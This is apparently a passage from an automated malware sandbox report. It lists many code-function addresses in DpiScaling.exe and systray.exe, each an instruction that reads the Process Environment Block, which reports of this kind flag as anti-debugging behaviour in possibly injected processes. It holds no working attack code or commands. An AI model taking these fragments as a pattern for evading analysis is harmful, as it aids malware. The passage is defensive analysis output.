          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0469B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04609080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04683884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04683884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0462B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0462B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04624120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04609100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04609100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04609100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0462C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04632990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0464927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046CEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04694257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04644A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04644A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04618A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04605210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04605210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04605210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04605210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04623A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04632AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04632ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0461AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0461AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04633B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04633B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0460F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0462DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046D5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04634BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04634BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04634BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046C138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_046BD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04611B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04611B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0463B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04632397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0454C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0454C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04572073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04581074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04537016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04537016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04537016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04584015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04584015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04571C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0458740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0458740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0458740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04536C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04536C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04536C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04536C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0454B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0454B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0454B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0454B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0454B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0454B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04588CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04536CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04536CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04536CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_045714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04533884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04533884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044EF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04533540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0453A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04588D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044D4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0457E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04536DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04536DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04536DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04536DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04536DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04536DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_04568DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0457FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0457FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0457FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_0457FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_045441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044EA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044DC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_044E2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_045351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_045351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_045351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 20_2_045351BE mov eax, dword ptr fs:[00000030h]
